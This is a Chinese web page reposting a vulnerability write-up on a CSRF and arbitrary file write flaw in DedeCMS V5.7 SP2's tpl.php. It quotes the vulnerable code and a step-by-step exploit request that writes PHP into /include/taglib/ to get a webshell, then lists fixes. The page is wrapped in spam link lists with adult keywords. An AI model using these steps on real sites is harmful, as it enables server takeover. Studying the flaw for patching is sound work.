麻豆小视频在线观看_中文黄色一级片_久久久成人精品_成片免费观看视频大全_午夜精品久久久久久久99热浪潮_成人一区二区三区四区

首頁 > CMS > 織夢DEDE > 正文

dedecms V5.7 SP2 友情鏈接CSRF+任意文件寫入漏洞

2024-08-30 19:08:09
字體:
來源:轉載
供稿:網(wǎng)友

DedeCMS V5.7 SP2版本中tpl.php存在代碼執(zhí)行漏洞,攻擊者可利用該漏洞在增加新的標簽中上傳木馬,獲取webshell。筆者是2018年2月28日在官網(wǎng)下載的DedeCMS V5.7 SP2版本程序,截至發(fā)稿,漏洞依然存在。

漏洞詳情

織夢默認的后臺地址是/dede/,當然也可以被更改,到時候根據(jù)網(wǎng)站具體情況替換默認后臺地址即可。

dede/tpl.php中第251行到281行

 

csrf_check();

 

if(!preg_match("#^[a-z0-9_-]{1,}/.lib/.php$#i", $filename))

 

{

 

    ShowMsg('文件名不合法,不允許進行操作!', '-1');

 

    exit();

 

}

 

require_once(DEDEINC.'/oxwindow.class.php');

 

$tagname = preg_replace("#/.lib/.php$#i", "", $filename);

 

$content = stripslashes($content);

 

$truefile = DEDEINC.'/taglib/'.$filename;

 

$fp = fopen($truefile, 'w');

 

fwrite($fp, $content);

 

fclose($fp);

 

1.由于dedecms全局變量注冊的特性,所以這里的content變量和filename變量可控。

2.可以看到將content直接寫入到文件中導致可以getshell。但是這里的文件名經(jīng)過正則表達式,所以必須要.lib.php結尾。

注意: 這里還有一個csrf_check()函數(shù),即請求中必須要帶token參數(shù)。

漏洞利用

1.首先獲取token 訪問 域名 + /dede/tpl.php?action=upload。在頁面源代碼中獲取到token值 

dedecms V5.7 SP2 友情鏈接CSRF+任意文件寫入漏洞

然后訪問 :

域名 + /dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[你的token值

dedecms V5.7 SP2 友情鏈接CSRF+任意文件寫入漏洞

shell:域名 + /include/taglib/moonsec.lib.php

漏洞修復

1.禁止/include/taglib/此處寫入文件。

2.過濾惡意標簽

3.刪除dede/tpl.php 文件


發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 久久久aa | 激情大乳女做爰办公室韩国 | 中国免费一级毛片 | 亚洲国产小视频 | 免费福利在线视频 | 久久在线| 99欧美精品 | 亚洲电影在线观看高清免费 | 黄色免费入口 | 日韩精品免费看 | 久久精品艹 | 91网页视频入口在线观看 | 国产午夜精品久久久久久久蜜臀 | 精品一区久久久 | 在线看免电影网站 | 国产免费一区视频 | www视频免费在线观看 | 免费的毛片| 男女羞羞视频在线免费观看 | 午夜在线观看视频网站 | 久久狠狠高潮亚洲精品 | 特逼视频| 日本网站在线播放 | 91看片王| 日本成年网 | 一区二区三区黄色 | 伊人在线视频 | 韩国精品视频在线观看 | 一级黄色在线观看 | 国产高潮好爽受不了了夜色 | 羞羞视频免费网站含羞草 | 斗破苍穹在线免费 | 在线亚洲欧美 | 色欧美视频| 国产精品91在线 | 欧美福利视频一区二区三区 | av在线直播观看 | 最新中文字幕在线 | 国产一级爱c视频 | 久久精品免费网站 | 911网站大全在线观看 |